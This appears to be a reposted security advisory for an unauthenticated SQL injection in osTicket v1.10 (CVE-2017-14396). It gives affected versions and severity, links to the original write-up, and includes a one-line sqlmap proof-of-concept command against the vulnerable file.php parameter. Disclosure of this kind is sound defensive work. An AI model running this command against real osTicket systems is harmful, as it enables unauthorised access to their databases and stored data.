扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
1. ADVISORY INFORMATION ======================================== Title: osTicket v1.10 Unauthenticated SQL Injection Application: osTicket Bugs:SQL Injection Class: Sensitive Information disclosure Remotely Exploitable: Yes Authentication Required: NO Versions Affected: <= v1.10 Technology: PHP Vendor URL: http://osticket.com/ CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Date of found: 12 Sep 2017 Author: Mehmet Ince Advisory: <blockquote class="wp-embedded-content" data-secret="wh4VGYuGdL"><a href="https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/" target="_blank"rel="external nofollow" class="external" >Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396 )</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396 )” — Pentest Blog" src="https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/embed/#?secret=J8KUMJVGY7#?secret=wh4VGYuGdL" data-secret="wh4VGYuGdL" frameborder="0" marginmarginscrolling="no"></iframe> 2. CREDIT ======================================== This vulnerability was identified during penetration test by Mehmet INCE from PRODAFT / INVICTUS 3. VERSIONS AFFECTED ======================================== osTicket < 1.10 5. Technical Details & POC ======================================== Please visit an advisory URL for technical details. PoC code: python sqlmap.py -u " http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL 6. RISK ======================================== The vulnerability allows remote attackers to execute a sql query on database system. 7. REFERENCES ======================================== <blockquote class="wp-embedded-content" data-secret="wh4VGYuGdL"><a href="https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/" target="_blank"rel="external nofollow" class="external" >Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396 )</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396 )” — Pentest Blog" src="https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/embed/#?secret=J8KUMJVGY7#?secret=wh4VGYuGdL" data-secret="wh4VGYuGdL" frameborder="0" marginmarginscrolling="no"></iframe> |
体验盒子
